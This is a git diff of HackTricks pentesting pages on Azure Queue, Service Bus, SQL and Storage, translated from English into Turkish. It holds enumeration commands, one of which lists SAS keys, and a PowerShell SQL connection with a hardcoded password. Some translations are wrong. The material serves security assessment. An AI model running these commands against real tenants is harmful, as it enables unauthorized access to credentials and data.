Azure Queue Storage, Microsoft'un Azure bulut platformunda uygulama bileşenleri arasında mesaj kuyruklama için tasarlanmış bir hizmettir, **asenkron iletişimi ve ayrıştırmayı sağlar**. Sınırsız sayıda mesajı, her biri 64 KB'a kadar boyutta depolamanıza olanak tanır ve kuyruk oluşturma ve silme, mesaj ekleme, alma, güncelleme ve silme gibi işlemleri destekler; ayrıca meta verileri ve erişim politikalarını yönetmenizi sağlar. Genellikle mesajları ilk giren ilk çıkar (FIFO) yöntemine göre işler, ancak katı FIFO garantisi verilmez.
### Enumeration
{{#tabs }}
{{#tab name="Az Cli" }}
```bash
# You need to know the --account-name of the storage (az storage account list)
az storage queue list --account-name <storage_account>
@@ -27,11 +26,9 @@ az storage message get --queue-name <queue_name> --account-name <storage_account
# Peek Messages
az storage message peek --queue-name <queue_name> --account-name <storage_account>
```
{{#endtab }}
{{#tab name="Az PS" }}
```bash
# Get the Storage Context
$storageAccount = Get-AzStorageAccount -ResourceGroupName QueueResourceGroup -Name queuestorageaccount1994
@@ -64,36 +61,31 @@ $visibilityTimeout = [System.TimeSpan]::FromSeconds(10)
$queueMessage = $queue.QueueClient.ReceiveMessages(1,$visibilityTimeout)
$queueMessage.Value
```
{{#endtab }}
{{#endtabs }}
### Privilege Escalation
### Yetki Yükseltme
{{#ref}}
../az-privilege-escalation/az-queue-privesc.md
{{#endref}}
### Post Exploitation
### Sömürü Sonrası
{{#ref}}
../az-post-exploitation/az-queue-post-exploitation.md
{{#endref}}
### Persistence
### Süreklilik
{{#ref}}
../az-persistence/az-queue-persistance.md
{{#endref}}
## References
## Referanslar
- https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
- https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api
- https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes
{{#include ../../../banners/hacktricks-training.md}}

82
src/pentesting-cloud/azure-security/az-services/az-servicebus-enum.md
View File

@@ -4,53 +4,52 @@
## Service Bus
Azure Service Bus is a cloud-based **messaging service** designed to enable reliable **communication between different parts of an application or separate applications**. It acts as a secure middleman, ensuring messages are safely delivered, even if the sender and receiver arent operating simultaneously. By decoupling systems, it allows applications to work independently while still exchanging data or instructions. Its particularly useful for scenarios requiring load balancing across multiple workers, reliable message delivery, or complex coordination, such as processing tasks in order or securely managing access.
Azure Service Bus, farklı uygulama parçaları veya ayrı uygulamalar arasında güvenilir **iletişim sağlamak** için tasarlanmış bulut tabanlı bir **mesajlaşma hizmetidir**. Gönderen ve alıcı aynı anda çalışmasa bile, mesajların güvenli bir şekilde iletilmesini sağlayan güvenli bir aracı olarak işlev görür. Sistemleri birbirinden ayırarak, uygulamaların bağımsız bir şekilde çalışmasına olanak tanırken, veri veya talimat alışverişi yapmalarını sağlar. Özellikle, birden fazla işçi arasında yük dengelemesi gerektiren senaryolar, güvenilir mesaj iletimi veya görevlerin sırayla işlenmesi ya da erişimin güvenli bir şekilde yönetilmesi gibi karmaşık koordinasyonlar için faydalıdır.
### Key Concepts
### Ana Kavramlar
1. **Queues:** its purpose is to store messages until the receiver is ready.
- Messages are ordered, timestamped, and durably stored.
- Delivered in pull mode (on-demand retrieval).
- Supports point-to-point communication.
2. **Topics:** Publish-subscribe messaging for broadcasting.
- Multiple independent subscriptions receive copies of messages.
- Subscriptions can have rules/filters to control delivery or add metadata.
- Supports many-to-many communication.
3. **Namespaces:** A container for all messaging components, queues and topics, is like your own slice of a powerful Azure cluster, providing dedicated capacity and optionally spanning across three availability zones.
1. **Kuyruklar:** Amacı, alıcı hazır olana kadar mesajları depolamaktır.
- Mesajlar sıralı, zaman damgalı ve kalıcı olarak depolanır.
- İhtiyaç duyulduğunda (isteğe bağlı alım) teslim edilir.
- Noktadan noktaya iletişimi destekler.
2. **Konu Başlıkları:** Yayın-abone mesajlaşması için yayın yapar.
- Birden fazla bağımsız abonelik, mesajların kopyalarını alır.
- Abonelikler, teslimatı kontrol etmek veya meta veriler eklemek için kurallar/filtreler içerebilir.
- Çoktan çoğa iletişimi destekler.
3. **Ad Alanları:** Tüm mesajlaşma bileşenleri, kuyruklar ve konu başlıkları için bir konteynerdir; güçlü bir Azure kümesinin kendi diliminiz gibidir ve özel kapasite sağlar ve isteğe bağlı olarak üç kullanılabilirlik bölgesine yayılabilir.
### Advance Features
### İleri Düzey Özellikler
Some advance features are:
Bazı ileri düzey özellikler şunlardır:
- **Message Sessions**: Ensures FIFO processing and supports request-response patterns.
- **Auto-Forwarding**: Transfers messages between queues or topics in the same namespace.
- **Dead-Lettering**: Captures undeliverable messages for review.
- **Scheduled Delivery**: Delays message processing for future tasks.
- **Message Deferral**: Postpones message retrieval until ready.
- **Transactions**: Groups operations into atomic execution.
- **Filters & Actions**: Applies rules to filter or annotate messages.
- **Auto-Delete on Idle**: Deletes queues after inactivity (min: 5 minutes).
- **Duplicate Detection**: Removes duplicate messages during resends.
- **Batch Deletion**: Bulk deletes expired or unnecessary messages.
- **Mesaj Oturumları**: FIFO işleme sağlar ve istek-cevap desenlerini destekler.
- **Otomatik İletim**: Aynı ad alanındaki kuyruklar veya konu başlıkları arasında mesajları aktarır.
- **Ölü Mektuplama**: İletilemeyen mesajları gözden geçirmek için yakalar.
- **Zamanlanmış Teslimat**: Mesaj işlemesini gelecekteki görevler için geciktirir.
- **Mesaj Erteleme**: Mesaj alımını hazır olana kadar erteler.
- **İşlemler**: İşlemleri atomik yürütme olarak gruplar.
- **Filtreler ve Eylemler**: Mesajları filtrelemek veya not eklemek için kurallar uygular.
- **Boşta Otomatik Silme**: Faaliyet göstermediğinde kuyrukları siler (min: 5 dakika).
- **Yinelenen Tespit**: Yeniden gönderimler sırasında yinelenen mesajları kaldırır.
- **Toplu Silme**: Süresi dolmuş veya gereksiz mesajları toplu olarak siler.
### Authorization-Rule / SAS Policy
### Yetkilendirme Kuralı / SAS Politikası
SAS Policies define the access permissions for Azure Service Bus entities namespace (Most Important One), queues and topics. Each policy has the following components:
SAS Politikaları, Azure Service Bus varlıkları ad alanı (En Önemli Olan), kuyruklar ve konu başlıkları için erişim izinlerini tanımlar. Her politika aşağıdaki bileşenlere sahiptir:
- **Permissions**: Checkboxes to specify access levels:
- Manage: Grants full control over the entity, including configuration and permissions management.
- Send: Allows sending messages to the entity.
- Listen: Allows receiving messages from the entity.
- **Primary and Secondary Keys**: These are cryptographic keys used to generate secure tokens for authenticating access.
- **Primary and Secondary Connection Strings**: Pre-configured connection strings that include the endpoint and key for easy use in applications.
- **SAS Policy ARM ID**: The Azure Resource Manager (ARM) path to the policy for programmatic identification.
- **İzinler**: Erişim seviyelerini belirtmek için onay kutuları:
- Yönet: Varlık üzerinde tam kontrol sağlar, yapılandırma ve izin yönetimi dahil.
- Gönder: Varlığa mesaj göndermeye izin verir.
- Dinle: Varlıktan mesaj almayı sağlar.
- **Birincil ve İkincil Anahtarlar**: Erişimi kimlik doğrulamak için güvenli token'lar oluşturmak için kullanılan kriptografik anahtarlardır.
- **Birincil ve İkincil Bağlantı Dize**: Uygulamalarda kolay kullanım için uç nokta ve anahtar içeren önceden yapılandırılmış bağlantı dizeleri.
- **SAS Politika ARM ID**: Programatik tanımlama için politikanın Azure Resource Manager (ARM) yolu.
### NameSpace
### Ad Alanı
sku, authrorization rule,
### Enumeration
sku, yetkilendirme kuralı,
### Sayım
```bash
# Queue Enumeration
az servicebus queue list --resource-group <MyResourceGroup> --namespace-name <MyNamespace>
@@ -78,27 +77,22 @@ az servicebus queue authorization-rule list --resource-group <MyResourceGroup> -
az servicebus topic authorization-rule list --resource-group <MyResourceGroup> --namespace-name <MyNamespace> --topic-name <MyTopic>
az servicebus namespace authorization-rule keys list --resource-group <MyResourceGroup> --namespace-name <MyNamespace> --name <MyAuthRule>
```
### Privilege Escalation
### Yetki Yükseltme
{{#ref}}
../az-privilege-escalation/az-servicebus-privesc.md
{{#endref}}
### Post Exploitation
### İstismar Sonrası
{{#ref}}
../az-post-exploitation/az-servicebus-post-exploitation.md
{{#endref}}
## References
## Referanslar
- https://learn.microsoft.com/en-us/powershell/module/az.servicebus/?view=azps-13.0.0
- https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-messaging-overview
- https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-quickstart-cli
{{#include ../../../banners/hacktricks-training.md}}

162
src/pentesting-cloud/azure-security/az-services/az-sql.md
View File

@@ -4,100 +4,99 @@
## Azure SQL
Azure SQL is a family of managed, secure, and intelligent products that use the **SQL Server database engine in the Azure cloud**. This means you don't have to worry about the physical administration of your servers, and you can focus on managing your data.
Azure SQL, **Azure bulutunda SQL Server veritabanı motorunu** kullanan yönetilen, güvenli ve akıllı ürünler ailesidir. Bu, sunucularınızın fiziksel yönetimiyle ilgili endişelenmenize gerek olmadığı ve verilerinizi yönetmeye odaklanabileceğiniz anlamına gelir.
Azure SQL consists of three main offerings:
Azure SQL, üç ana teklifi içerir:
1. **Azure SQL Database**: This is a **fully-managed database service**, which allows you to host individual databases in the Azure cloud. It offers built-in intelligence that learns your unique database patterns and provides customized recommendations and automatic tuning.
2. **Azure SQL Managed Instance**: This is for larger scale, entire SQL Server instance-scoped deployments. It provides near 100% compatibility with the latest SQL Server on-premises (Enterprise Edition) Database Engine, which provides a native virtual network (VNet) implementation that addresses common security concerns, and a business model favorable for on-premises SQL Server customers.
3. **Azure SQL Server on Azure VMs**: This is Infrastructure as a Service (IaaS) and is best for migrations where you want **control over the operating system and SQL Server instance**, like it was a server running on-premises.
1. **Azure SQL Database**: Bu, Azure bulutunda bireysel veritabanlarını barındırmanıza olanak tanıyan **tamamen yönetilen bir veritabanı hizmetidir**. Eşsiz veritabanı desenlerinizi öğrenen ve özelleştirilmiş öneriler ve otomatik ayarlama sağlayan yerleşik bir zekaya sahiptir.
2. **Azure SQL Managed Instance**: Bu, daha büyük ölçekli, tüm SQL Server örneği kapsamındaki dağıtımlar içindir. En son SQL Server yerel (Enterprise Edition) Veritabanı Motoru ile neredeyse %100 uyumluluk sağlar, yaygın güvenlik endişelerini ele alan yerel bir sanal ağ (VNet) uygulaması sunar ve yerel SQL Server müşterileri için uygun bir iş modeli sağlar.
3. **Azure SQL Server on Azure VMs**: Bu, Hizmet Olarak Altyapı (IaaS) olup, yerel olarak çalışan bir sunucu gibi **işletim sistemi ve SQL Server örneği üzerinde kontrol** istediğiniz göçler için en iyisidir.
### Azure SQL Database
**Azure SQL Database** is a **fully managed database platform as a service (PaaS)** that provides scalable and secure relational database solutions. It's built on the latest SQL Server technologies and eliminates the need for infrastructure management, making it a popular choice for cloud-based applications.
**Azure SQL Database**, ölçeklenebilir ve güvenli ilişkisel veritabanı çözümleri sunan **tamamen yönetilen bir veritabanı platformu olarak hizmettir (PaaS)**. En son SQL Server teknolojileri üzerine inşa edilmiştir ve altyapı yönetimi gereksinimini ortadan kaldırarak bulut tabanlı uygulamalar için popüler bir seçim haline gelmiştir.
#### Key Features
#### Ana Özellikler
- **Always Up-to-Date**: Runs on the latest stable version of SQL Server and Receives new features and patches automatically.
- **PaaS Capabilities**: Built-in high availability, backups, and updates.
- **Data Flexibility**: Supports relational and non-relational data (e.g., graphs, JSON, spatial, and XML).
- **Her Zaman Güncel**: En son kararlı SQL Server sürümünde çalışır ve yeni özellikler ile yamaları otomatik olarak alır.
- **PaaS Yetenekleri**: Yerleşik yüksek kullanılabilirlik, yedeklemeler ve güncellemeler.
- **Veri Esnekliği**: İlişkisel ve ilişkisel olmayan verileri destekler (örneğin, grafikler, JSON, mekansal ve XML).
#### Purchasing Models / Service Tiers
#### Satın Alma Modelleri / Hizmet Katmanları
- **vCore-based**: Choose compute, memory, and storage independently. For General Purpose, Business Critical (with high resilience and performance for OLTP apps), and scales up to 128 TB storag
- **DTU-based**: Bundles compute, memory, and I/O into fixed tiers. Balanced resources for common tasks.
- Standard: Balanced resources for common tasks.
- Premium: High performance for demanding workloads.
- **vCore tabanlı**: Hesaplama, bellek ve depolamayı bağımsız olarak seçin. Genel Amaç, İş Kritik (OLTP uygulamaları için yüksek dayanıklılık ve performans ile) ve 128 TB depolama kapasitesine kadar ölçeklenir.
- **DTU tabanlı**: Hesaplama, bellek ve I/O'yu sabit katmanlara toplar. Yaygın görevler için dengeli kaynaklar.
- Standart: Yaygın görevler için dengeli kaynaklar.
- Premium: Talepkar iş yükleri için yüksek performans.
#### Deployment Models
#### Dıtım Modelleri
Azure SQL Database supports flexible deployment options to suit various needs:
Azure SQL Database, çeşitli ihtiyaçlara uygun esnek dağıtım seçeneklerini destekler:
- **Single Database**:
- A fully isolated database with its own dedicated resources.
- Great for microservices or applications requiring a single data source.
- **Elastic Pool**:
- Allows multiple databases to share resources within a pool.
- Cost-efficient for applications with fluctuating usage patterns across multiple databases.
- **Tek Veritabanı**:
- Kendi özel kaynaklarıyla tamamen izole bir veritabanı.
- Mikro hizmetler veya tek bir veri kaynağı gerektiren uygulamalar için harika.
- **Esnek Havuz**:
- Bir havuz içinde birden fazla veritabanının kaynakları paylaşmasına olanak tanır.
- Birden fazla veritabanı arasında dalgalanan kullanım desenleri için maliyet etkin.
#### Scalable performance and pools
#### Ölçeklenebilir performans ve havuzlar
- **Single Databases**: Each database is isolated and has its own dedicated compute, memory, and storage resources. Resources can be scaled dynamically (up or down) without downtime (1128 vCores, 32 GB4 TB storage, and up to 128 TB).
- **Elastic Pools**: Share resources across multiple databases in a pool to maximize efficiency and save costs. Resources can also be scaled dynamically for the entire pool.
- **Service Tier Flexibility**: Start small with a single database in the General Purpose tier. Upgrade to Business Critical or Hyperscale tiers as needs grow.
- **Scaling Options**: Dynamic Scaling or Autoscaling Alternatives.
- **Tek Veritabanları**: Her veritabanı izole olup kendi özel hesaplama, bellek ve depolama kaynaklarına sahiptir. Kaynaklar, kesinti olmadan dinamik olarak (yukarı veya aşağı) ölçeklenebilir (1128 vCore, 32 GB4 TB depolama ve 128 TB'a kadar).
- **Esnek Havuzlar**: Verimliliği artırmak ve maliyetleri düşürmek için bir havuzda birden fazla veritabanı arasında kaynakları paylaşır. Tüm havuz için kaynaklar da dinamik olarak ölçeklenebilir.
- **Hizmet Katmanı Esnekliği**: Genel Amaç katmanında tek bir veritabanı ile küçük başlayın. İhtiyaçlar arttıkça İş Kritik veya Hiperscale katmanlarına yükseltin.
- **Ölçeklendirme Seçenekleri**: Dinamik Ölçeklendirme veya Otomatik Ölçeklendirme Alternatifleri.
#### Built-In Monitoring & Optimization
#### Yerleşik İzleme & Optimizasyon
- **Query Store**: Tracks performance issues, identifies top resource consumers, and offers actionable recommendations.
- **Automatic Tuning**: Proactively optimizes performance with features like automatic indexing and query plan corrections.
- **Telemetry Integration**: Supports monitoring through Azure Monitor, Event Hubs, or Azure Storage for tailored insights.
- **Sorgu Deposu**: Performans sorunlarını takip eder, en fazla kaynak tüketenleri belirler ve uygulanabilir öneriler sunar.
- **Otomatik Ayarlama**: Otomatik dizinleme ve sorgu planı düzeltmeleri gibi özelliklerle performansı proaktif olarak optimize eder.
- **Telemetri Entegrasyonu**: Özelleştirilmiş içgörüler için Azure Monitor, Event Hubs veya Azure Storage aracılığıyla izlemeyi destekler.
#### Disaster Recovery & Availavility
#### Felaket Kurtarma & Kullanılabilirlik
- **Automatic backups**: SQL Database automatically performs full, differential, and transaction log backups of databases
- **Point-in-Time Restore**: Recover databases to any past state within the backup retention period.
- **Geo-Redundancy**
- **Failover Groups**: Simplifies disaster recovery by grouping databases for automatic failover across regions.
- **Otomatik yedeklemeler**: SQL Database, veritabanlarının tam, diferansiyel ve işlem günlüğü yedeklemelerini otomatik olarak gerçekleştirir.
- **Anlık Geri Yükleme**: Veritabanlarını yedekleme saklama süresi içinde herhangi bir geçmiş duruma geri yükleyin.
- **Coğrafi Yedeklilik**
- **Kayıp Grupları**: Veritabanlarını bölgeler arasında otomatik failover için gruplandırarak felaket kurtarmayı basitleştirir.
### Azure SQL Managed Instance
**Azure SQL Managed Instance** is a Platform as a Service (PaaS) database engine that offers near 100% compatibility with SQL Server and handles most management tasks (e.g., upgrading, patching, backups, monitoring) automatically. It provides a cloud solution for migrating on-premises SQL Server databases with minimal changes.
**Azure SQL Managed Instance**, SQL Server ile neredeyse %100 uyumluluk sunan ve çoğu yönetim görevini (örneğin, yükseltme, yamanın uygulanması, yedekleme, izleme) otomatik olarak gerçekleştiren bir Platform olarak Hizmet (PaaS) veritabanı motorudur. Yerel SQL Server veritabanlarını minimum değişiklikle buluta taşımak için bir çözüm sunar.
#### Service Tiers
#### Hizmet Katmanları
- **General Purpose**: Cost-effective option for applications with standard I/O and latency requirements.
- **Business Critical**: High-performance option with low I/O latency for critical workloads.
- **Genel Amaç**: Standart I/O ve gecikme gereksinimleri olan uygulamalar için maliyet etkin bir seçenek.
- **İş Kritik**: Kritik iş yükleri için düşük I/O gecikmesi ile yüksek performans seçeneği.
#### Advanced Security Features
#### Gelişmiş Güvenlik Özellikleri
* **Threat Protection**: Advanced Threat Protection alerts for suspicious activities and SQL injection attacks. Auditing to track and log database events for compliance.
* **Access Control**: Microsoft Entra authentication for centralized identity management. Row-Level Security and Dynamic Data Masking for granular access control.
* **Backups**: Automated and manual backups with point-in-time restore capability.
* **Tehdit Koruma**: Şüpheli etkinlikler ve SQL enjeksiyon saldırıları için Gelişmiş Tehdit Koruma uyarıları. Uyum için veritabanı olaylarını takip etmek ve kaydetmek için denetim.
* **Erişim Kontrolü**: Merkezi kimlik yönetimi için Microsoft Entra kimlik doğrulaması. Granüler erişim kontrolü için Satır Düzeyi Güvenlik ve Dinamik Veri Maskeleme.
* **Yedeklemeler**: Anlık geri yükleme yeteneği ile otomatik ve manuel yedeklemeler.
### Azure SQL Virtual Machines
### Azure SQL Sanal Makineleri
**Azure SQL Virtual Machines** is best for migrations where you want **control over the operating system and SQL Server instance**, like it was a server running on-premises. It can have different machine sizes, and a wide selection of SQL Server versions and editions.
**Azure SQL Sanal Makineleri**, yerel olarak çalışan bir sunucu gibi **işletim sistemi ve SQL Server örneği üzerinde kontrol** istediğiniz göçler için en iyisidir. Farklı makine boyutlarına ve geniş bir SQL Server sürüm ve sürüm seçeneğine sahip olabilir.
#### Key Features
#### Ana Özellikler
**Automated Backup**: Schedule backups for SQL databases.
**Automatic Patching**: Automates the installation of Windows and SQL Server updates during a maintenance window.
**Azure Key Vault Integration**: Automatically configures Key Vault for SQL Server VMs.
**Defender for Cloud Integration**: View Defender for SQL recommendations in the portal.
**Version/Edition Flexibility**: Change SQL Server version or edition metadata without redeploying the VM.
**Otomatik Yedekleme**: SQL veritabanları için yedekleme programı oluşturun.
**Otomatik Yamanın Uygulanması**: Bakım penceresi sırasında Windows ve SQL Server güncellemelerinin otomatik olarak yüklenmesini sağlar.
**Azure Key Vault Entegrasyonu**: SQL Server VM'leri için Key Vault'u otomatik olarak yapılandırır.
**Defender for Cloud Entegrasyonu**: Portalda SQL için Defender önerilerini görüntüleyin.
**Sürüm/Sürüm Esnekliği**: VM'yi yeniden dağıtmadan SQL Server sürüm veya sürüm meta verisini değiştirin.
#### Security Features
#### Güvenlik Özellikleri
**Microsoft Defender for SQL**: Security insights and alerts.
**Azure Key Vault Integration**: Secure storage of credentials and encryption keys.
**Microsoft Entra (Azure AD)**: Authentication and access control.
**Microsoft Defender for SQL**: Güvenlik içgörüleri ve uyarılar.
**Azure Key Vault Entegrasyonu**: Kimlik bilgileri ve şifreleme anahtarlarının güvenli depolanması.
**Microsoft Entra (Azure AD)**: Kimlik doğrulama ve erişim kontrolü.
## Enumeration
{{#tabs}}
{{#tab name="az cli"}}
```bash
# List Servers
az sql server list # --output table
@@ -164,11 +163,9 @@ az sql midb show --resource-group <res-grp> --name <name>
az sql vm list
az sql vm show --resource-group <res-grp> --name <name>
```
{{#endtab}}
{{#tab name="Az PowerShell"}}
```powershell
# List Servers
Get-AzSqlServer -ResourceGroupName "<resource-group-name>"
@@ -206,60 +203,51 @@ Get-AzSqlInstanceDatabase -ResourceGroupName <ResourceGroupName> -InstanceName <
# Lis all sql VM
Get-AzSqlVM
```
{{#endtab}}
{{#endtabs}}
### Connect and run SQL queries
You could find a connection string (containing credentials) from example [enumerating an Az WebApp](az-app-services.md):
### Bağlanın ve SQL sorguları çalıştırın
Örnek [bir Az WebApp'ı numaralandırma](az-app-services.md) ile bir bağlantı dizesi (kimlik bilgilerini içeren) bulabilirsiniz:
```powershell
function invoke-sql{
param($query)
$Connection_string = "Server=tcp:supercorp.database.windows.net,1433;Initial Catalog=flag;Persist Security Info=False;User ID=db_read;Password=gAegH!324fAG!#1fht;MultipleActiveResultSets=False;Encrypt=True;TrustServerCertificate=False;Connection Timeout=30;"
$Connection = New-Object System.Data.SqlClient.SqlConnection $Connection_string
$Connection.Open()
$Command = New-Object System.Data.SqlClient.SqlCommand
$Command.Connection = $Connection
$Command.CommandText = $query
$Reader = $Command.ExecuteReader()
while ($Reader.Read()) {
$Reader.GetValue(0)
}
$Connection.Close()
param($query)
$Connection_string = "Server=tcp:supercorp.database.windows.net,1433;Initial Catalog=flag;Persist Security Info=False;User ID=db_read;Password=gAegH!324fAG!#1fht;MultipleActiveResultSets=False;Encrypt=True;TrustServerCertificate=False;Connection Timeout=30;"
$Connection = New-Object System.Data.SqlClient.SqlConnection $Connection_string
$Connection.Open()
$Command = New-Object System.Data.SqlClient.SqlCommand
$Command.Connection = $Connection
$Command.CommandText = $query
$Reader = $Command.ExecuteReader()
while ($Reader.Read()) {
$Reader.GetValue(0)
}
$Connection.Close()
}
invoke-sql 'Select Distinct TABLE_NAME From information_schema.TABLES;'
```
You can also use sqlcmd to access the database. It is important to know if the server allows public connections `az sql server show --name <server-name> --resource-group <resource-group>`, and also if it the firewall rule let's our IP to access:
Veritabanına erişmek için sqlcmd'yi de kullanabilirsiniz. Sunucunun genel bağlantılara izin verip vermediğini bilmek önemlidir `az sql server show --name <server-name> --resource-group <resource-group>`, ayrıca güvenlik duvarı kuralının IP'mizin erişmesine izin verip vermediğini de kontrol etmek gerekir:
```powershell
sqlcmd -S <sql-server>.database.windows.net -U <server-user> -P <server-passworkd> -d <database>
```
## References
## Referanslar
- [https://learn.microsoft.com/en-us/azure/azure-sql/azure-sql-iaas-vs-paas-what-is-overview?view=azuresql](https://learn.microsoft.com/en-us/azure/azure-sql/azure-sql-iaas-vs-paas-what-is-overview?view=azuresql)
- [https://learn.microsoft.com/en-us/azure/azure-sql/database/single-database-overview?view=azuresql](https://learn.microsoft.com/en-us/azure/azure-sql/database/single-database-overview?view=azuresql)
- [https://learn.microsoft.com/en-us/azure/azure-sql/managed-instance/sql-managed-instance-paas-overview?view=azuresql](https://learn.microsoft.com/en-us/azure/azure-sql/managed-instance/sql-managed-instance-paas-overview?view=azuresql)
- [https://learn.microsoft.com/en-us/azure/azure-sql/virtual-machines/windows/sql-server-on-azure-vm-iaas-what-is-overview?view=azuresql](https://learn.microsoft.com/en-us/azure/azure-sql/virtual-machines/windows/sql-server-on-azure-vm-iaas-what-is-overview?view=azuresql)
## Privilege Escalation
## Yetki Yükseltme
{{#ref}}
../az-privilege-escalation/az-sql-privesc.md
{{#endref}}
## Post Exploitation
## İstismar Sonrası
{{#ref}}
../az-post-exploitation/az-sql-post-exploitation.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

438
src/pentesting-cloud/azure-security/az-services/az-storage.md
View File

@@ -1,227 +1,216 @@
# Az - Storage Accounts & Blobs
# Az - Depolama Hesapları ve Bloblar
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
## Temel Bilgiler
Azure Storage Accounts are fundamental services in Microsoft Azure that provide scalable, secure, and highly available cloud **storage for various data types**, including blobs (binary large objects), files, queues, and tables. They serve as containers that group these different storage services together under a single namespace for easy management.
Azure Depolama Hesapları, Microsoft Azure'daki temel hizmetlerdir ve çeşitli veri türleri için ölçeklenebilir, güvenli ve yüksek erişilebilir bulut **depolama sağlar**, bunlar arasında bloblar (ikili büyük nesneler), dosyalar, kuyruklar ve tablolar bulunur. Bu hizmetler, kolay yönetim için farklı depolama hizmetlerini tek bir ad alanı altında gruplandıran konteynerler olarak hizmet eder.
**Main configuration options**:
**Ana yapılandırma seçenekleri**:
- Every storage account must have a **uniq name across all Azure**.
- Every storage account is deployed in a **region** or in an Azure extended zone
- It's possible to select the **premium** version of the storage account for better performance
- It's possible to select among **4 types of redundancy to protect** against rack, drive and datacenter **failures**.
- Her depolama hesabının **tüm Azure'da benzersiz bir adı** olmalıdır.
- Her depolama hesabı bir **bölge** veya Azure genişletilmiş bölgesinde dağıtılır.
- Daha iyi performans için depolama hesabının **premium** versiyonunu seçmek mümkündür.
- Rack, sürücü ve veri merkezi **arızalarına** karşı korumak için **4 tür yedeklilik** arasından seçim yapmak mümkündür.
**Security configuration options**:
**Güvenlik yapılandırma seçenekleri**:
- **Require secure transfer for REST API operations**: Require TLS in any communication with the storage
- **Allows enabling anonymous access on individual containers**: If not, it won't be possible to enable anonymous access in the future
- **Enable storage account key access**: If not, access with Shared Keys will be forbidden
- **Minimum TLS version**
- **Permitted scope for copy operations**: Allow from any storage account, from any storage account from the same Entra tenant or from storage account with private endpoints in the same virtual network.
- **REST API işlemleri için güvenli aktarım gerektir**: Depolama ile yapılan her iletişimde TLS gerektir.
- **Bireysel konteynerlerde anonim erişimi etkinleştirmeye izin verir**: Aksi takdirde, gelecekte anonim erişimi etkinleştirmek mümkün olmayacaktır.
- **Depolama hesabı anahtar erişimini etkinleştir**: Aksi takdirde, Paylaşılan Anahtarlarla erişim yasaklanacaktır.
- **Minimum TLS sürümü**
- **Kopyalama işlemleri için izin verilen kapsam**: Herhangi bir depolama hesabından, aynı Entra kiracısından herhangi bir depolama hesabından veya aynı sanal ağda özel uç noktaları olan depolama hesabından izin verin.
**Blob Storage options**:
**Blob Depolama seçenekleri**:
- **Allow cross-tenant replication**
- **Access tier**: Hot (frequently access data), Cool and Cold (rarely accessed data)
- **Çapraz kiracı çoğaltmaya izin ver**
- **Erişim katmanı**: Sıcak (sık erişilen veriler), Soğuk ve Soğuk (nadiren erişilen veriler)
**Networking options**:
**Ağ seçenekleri**:
- **Network access**:
- Allow from all networks
- Allow from selected virtual networks and IP addresses
- Disable public access and use private access
- **Private endpoints**: It allows a private connection to the storage account from a virtual network
- **Ağ erişimi**:
- Tüm ağlardan izin ver
- Seçilen sanal ağlardan ve IP adreslerinden izin ver
- Genel erişimi devre dışı bırak ve özel erişim kullan
- **Özel uç noktalar**: Sanal ağdan depolama hesabına özel bir bağlantı sağlar.
**Data protection options**:
**Veri koruma seçenekleri**:
- **Point-in-time restore for containers**: Allows to restore containers to an earlier state
- It requires versioning, change feed, and blob soft delete to be enabled.
- **Enable soft delete for blobs**: It enables a retention period in days for deleted blobs (even overwritten)
- **Enable soft delete for containers**: It enables a retention period in days for deleted containers
- **Enable soft delete for file shares**: It enables a retention period in days for deleted file shared
- **Enable versioning for blobs**: Maintain previous versions of your blobs
- **Enable blob change feed**: Keep logs of create, modification, and delete changes to blobs
- **Enable version-level immutability support**: Allows you to set time-based retention policy on the account-level that will apply to all blob versions.
- Version-level immutability support and point-in-time restore for containers cannot be enabled simultaneously.
- **Konteynerler için anlık görüntü geri yükleme**: Konteynerleri daha önceki bir duruma geri yüklemeye izin verir.
- Versiyonlama, değişiklik akışı ve blob yumuşak silme etkinleştirilmelidir.
- **Bloblar için yumuşak silmeyi etkinleştir**: Silinen bloblar (hatta üzerine yazılanlar) için gün sayısı cinsinden bir saklama süresi sağlar.
- **Konteynerler için yumuşak silmeyi etkinleştir**: Silinen konteynerler için gün sayısı cinsinden bir saklama süresi sağlar.
- **Dosya paylaşımları için yumuşak silmeyi etkinleştir**: Silinen dosya paylaşımları için gün sayısı cinsinden bir saklama süresi sağlar.
- **Bloblar için versiyonlamayı etkinleştir**: Bloblarınızın önceki sürümlerini koruyun.
- **Blob değişiklik akışını etkinleştir**: Bloblara yapılan oluşturma, değiştirme ve silme değişikliklerinin günlüklerini tutun.
- **Sürüm düzeyinde değişmezlik desteğini etkinleştir**: Tüm blob sürümlerine uygulanacak zaman tabanlı saklama politikası belirlemenizi sağlar.
- Sürüm düzeyinde değişmezlik desteği ve konteynerler için anlık görüntü geri yükleme aynı anda etkinleştirilemez.
**Encryption configuration options**:
**Şifreleme yapılandırma seçenekleri**:
- **Encryption type**: It's possible to use Microsoft-managed keys (MMK) or Customer-managed keys (CMK)
- **Enable infrastructure encryption**: Allows to double encrypt the data "for more security"
- **Şifreleme türü**: Microsoft yönetimli anahtarlar (MMK) veya Müşteri yönetimli anahtarlar (CMK) kullanmak mümkündür.
- **Altyapı şifrelemesini etkinleştir**: Verileri "daha fazla güvenlik" için çift şifrelemeye izin verir.
### Storage endpoints
### Depolama uç noktaları
<table data-header-hidden><thead><tr><th width="197">Storage Service</th><th>Endpoint</th></tr></thead><tbody><tr><td><strong>Blob storage</strong></td><td><code>https://&#x3C;storage-account>.blob.core.windows.net</code><br><br><code>https://&#x3C;stg-acc>.blob.core.windows.net/&#x3C;container-name>?restype=container&#x26;comp=list</code></td></tr><tr><td><strong>Data Lake Storage</strong></td><td><code>https://&#x3C;storage-account>.dfs.core.windows.net</code></td></tr><tr><td><strong>Azure Files</strong></td><td><code>https://&#x3C;storage-account>.file.core.windows.net</code></td></tr><tr><td><strong>Queue storage</strong></td><td><code>https://&#x3C;storage-account>.queue.core.windows.net</code></td></tr><tr><td><strong>Table storage</strong></td><td><code>https://&#x3C;storage-account>.table.core.windows.net</code></td></tr></tbody></table>
